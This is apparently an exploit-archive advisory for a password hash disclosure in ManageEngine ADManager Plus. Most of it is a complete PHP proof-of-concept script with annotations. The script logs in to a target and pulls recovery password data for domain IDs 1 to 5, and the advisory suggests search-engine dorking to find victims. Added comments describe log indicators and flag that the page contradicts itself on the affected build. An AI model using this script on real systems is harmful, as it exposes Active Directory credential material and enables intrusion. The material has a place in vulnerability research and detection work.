Headline
ManageEngine ADManager 7183 Password Hash Disclosure
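ManageEngine ADManager version 7183 is reported to suffer from a password hash disclosure vulnerability. Note that the advisory text below states the affected range as ADManager Plus versions prior to build 7183, so confirm the exact affected and fixed builds against the vendor's release notes.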
=============================================================================================================================================
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.manageengine.com/products/ad-manager/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.
[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..
[+] save code as poc.php .
[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>
[+] PayLoad :

<?php
// Reviewer summary (what the listing below does, read from the code itself):
//   1. POSTs the supplied username/password to j_security_check, i.e. it needs
//      an account that can already log in to the product.
//   2. Then issues GET requests to ConfigureRecoverySettings/GET_PASS with
//      req={"domainId":"<n>"} for n = 1..5 and prints whatever comes back.
// NOTE(review): the page gives no CVE or vendor advisory id and is inconsistent
// about whether build 7183 itself is affected ("7183" in the title, "prior to
// build 7183" in the text) - confirm the fixed build with the vendor.

// Original comment (translated): "disable HTTPS warnings".
// What the call actually does is turn off all PHP error reporting.
error_reporting(0);

/**
 * Log in to the target and request the recovery-settings password data for
 * domain ids 1 through 5, echoing each non-empty response.
 *
 * Calls exit() when the login response is not judged successful, so nothing
 * after the login check runs in that case.
 *
 * @param string $target   Base URL; the request paths are appended to it as-is.
 * @param string $auth     Value sent as "domainName"; 'admanager' (any case) is
 *                         expanded to 'ADManager Plus Authentication'.
 * @param string $user     Sent as j_username.
 * @param string $password Sent as j_password.
 */
function getPass($target, $auth, $user, $password) {
    // Initialise the session (a single cURL handle used for every request below).
    $ch = curl_init();

    // Convert the authentication type if it is ADManager.
    if (strtolower($auth) == 'admanager') {
        $auth = 'ADManager Plus Authentication';
    }

    // Login form data.
    $data = http_build_query([
        "is_admp_pass_encrypted" => "false",
        "j_username" => $user,
        "j_password" => $password,
        "domainName" => $auth,
        "AUTHRULE_NAME" => "ADAuthenticator"
    ]);

    // Request settings.
    $url = $target . 'j_security_check?LogoutFromSSO=true';
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    // Caveat: both TLS checks are switched off, so the credentials above are
    // sent to whatever host answers, without certificate or hostname validation.
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    // Fixed request headers. The User-Agent is a single hard-coded string, so it
    // is at best a weak indicator when matching this script in web logs.
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Content-Type: application/x-www-form-urlencoded"
    ]);

    // Send the request.
    $response = curl_exec($ch);

    // Verify authentication: the presence of the text 'Cookie' in the returned
    // response is treated as success; otherwise HTTP 200 is reported as bad
    // credentials and any other status as a generic failure.
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if (strpos($response, 'Cookie') !== false) {
        echo "[+] Authentication successful!\n";
    } elseif ($http_code == 200) {
        echo "[-] Invalid login name/password!\n";
        exit(0);
    } else {
        echo "[-] Something went wrong!\n";
        exit(1);
    }

    // Retrieve the password.
    // Defender note: in the product's web access logs this shows up as one
    // client requesting ConfigureRecoverySettings/GET_PASS five times in a row
    // with domainId 1..5 shortly after a j_security_check login. Presumably the
    // response body carries the recovery password material the title refers to
    // - confirm on a patched/unpatched lab instance before relying on that.
    for ($i = 1; $i <= 5; $i++) {
        echo "[*] Trying to fetch recovery password for domainId: $i!\n";
        // The encoded query string decodes to req={"domainId":"<i>"}.
        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';
        curl_setopt($ch, CURLOPT_URL, $passUrl);
        curl_setopt($ch, CURLOPT_POST, false);
        $passResponse = curl_exec($ch);
        // Any non-empty response is printed verbatim; it is not parsed or checked.
        if ($passResponse) {
            echo $passResponse . "\n";
        }
    }
    curl_close($ch);
}

/**
 * Read -t/--target, -a/--auth, -u/--user and -p/--password from $argv.
 *
 * Each flag takes the following argument as its value. Unknown arguments are
 * ignored and missing options stay as empty strings.
 *
 * Caveat: the password is taken from the command line, where it can end up in
 * shell history and process listings on the machine running the script.
 *
 * @return array Map with the keys 'target', 'auth', 'user' and 'password'.
 */
function get_args() {
    global $argv;
    $args = [
        'target' => '',
        'auth' => '',
        'user' => '',
        'password' => ''
    ];
    for ($i = 1; $i < count($argv); $i++) {
        switch ($argv[$i]) {
            case '-t':
            case '--target':
                $args['target'] = $argv[++$i];
                break;
            case '-a':
            case '--auth':
                $args['auth'] = $argv[++$i];
                break;
            case '-u':
            case '--user':
                $args['user'] = $argv[++$i];
                break;
            case '-p':
            case '--password':
                $args['password'] = $argv[++$i];
                break;
        }
    }
    return $args;
}

/**
 * Entry point: require all four options, otherwise print usage and exit(1).
 *
 * The usage text names the script exploit.php although the advisory header
 * says to save it as poc.php.
 */
function main() {
    $args = get_args();
    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {
        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";
        exit(1);
    }
    getPass($args['target'], $args['auth'], $args['user'], $args['password']);
}

main();
?>
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
|===================================================================================================